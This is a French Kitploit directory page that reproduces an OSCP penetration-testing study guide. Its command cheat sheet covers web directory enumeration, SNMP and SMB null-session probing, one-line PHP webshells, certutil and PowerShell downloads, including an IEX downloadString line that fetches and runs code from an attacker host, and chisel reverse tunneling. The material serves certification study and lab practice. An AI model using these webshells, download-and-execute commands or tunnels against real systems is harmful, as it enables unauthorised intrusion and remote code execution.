Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
OSCP — OSCP Study Guide | Kitploit
Outils/GitHubGitHub/rootsecdev/oscp
ReconnaissanceExploitationWeb Application ExploitationPost-ExploitationWeb SecurityNetwork SecurityPenetration TestingLearning & EducationRed Teaming
GitHubrootsecdev/oscp

OSCP

OSCP Study Guide

425il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
Partager

OSCP

Guide d'étude OSCP

Table des matières

Énumération et reconnaissance

Énumération Web

Scan Nikto :

root@kitploit:~
nikto -h http://10.10.10.1

Découverte de répertoires avec différents outils :

DIRB

root@kitploit:~
dirb http://10.10.10.1

Gobuster

root@kitploit:~
gobuster dir -u http://10.129.155.74:3000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x aspx

Test d'intrusion d'applications Web

Payloads XSS : Aide-mémoire : https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection

Test de formulaire XSS de base avec un écouteur netcat ou un serveur web Python

root@kitploit:~

Cross-site scripting pour extraire les cookies en base64. Assurez-vous d'encoder l'URL dans Burp avec Ctrl + U

root@kitploit:~

Webshells

Référence : https://sushant747.gitbooks.io/total-oscp-guide/content/webshell.html

Webshell PHP simple pour l'exécution de commandes

root@kitploit:~
<?php system($_REQUEST ['cmd']) ?>
root@kitploit:~
<?php system($_GET['cmd']); ?>

Test d'intrusion SNMP

Port 161 UDP

root@kitploit:~
snmpwalk -c public -v2c 10.129.213.210
root@kitploit:~
snmp-check 10.129.213.210

Test d'intrusion SMB

root@kitploit:~
crackmapexec smb 10.129.70.254 

Détecter les partages anonymes ouverts

root@kitploit:~
smbclient -L //10.129.70.254

Authentification nulle

root@kitploit:~
smbclient -N -L //10.129.70.254

Post-exploitation

Téléchargement et transfert de fichiers

Certutil :

root@kitploit:~
certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe

PowerShell :

root@kitploit:~
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
root@kitploit:~
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.11.0.4/nc.exe')"

Redirection de ports et tunneling

Utilisation de Chisel :

Exemple de redirection de port pour que le port 910 soit disponible sur la machine Kali

root@kitploit:~
on victim machine setup port forwarding
chisel.exe client 10.10.16.10:5555 R:910:127.0.0.1:910
root@kitploit:~
On Kali attack box setup a reverse listner for port forward with chisel
./chisel server --port 5555 --reverse
Télécharger l’outil